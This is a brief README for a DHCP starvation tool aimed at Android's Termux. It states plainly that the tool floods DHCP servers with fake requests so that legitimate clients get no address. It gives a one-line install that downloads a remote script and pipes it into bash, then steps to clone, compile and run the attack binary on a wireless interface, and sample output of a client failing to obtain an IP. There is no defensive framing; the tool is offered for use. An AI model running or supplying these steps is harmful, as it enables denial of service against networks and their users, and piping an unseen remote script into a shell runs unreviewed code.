A DHCP starvation tool is a powerful network attack tool that floods a DHCP server with fake DHCP requests, exhausting all available IP addresses in the DHCP pool. This prevents legitimate clients from obtaining an IP address, leading to network disruptions or a complete denial of service (DoS) for affected devices.
- g++ gcc clang compiler
- Termux App
pkg update && pkg install wget -y && wget -qO- https://raw.githubusercontent.com/xiv3r/dhcp-starvation/refs/heads/main/auto | bash && cd dhcp-starvation
- install package
pkg update
pkg install wget git clang -y
- clone the repo
git clone https://github.com/xiv3r/dhcp-starvation.git
cd dhcp-starvation
- compiling
g++ fuck.cpp -o fuck
- run
add interface "
./fuck -i wlan0
"
./fuck
Disconnect and Reconnect on gateway 192.168.1.1/24
Connecting...
Obtaining IP...
No IP Allocation...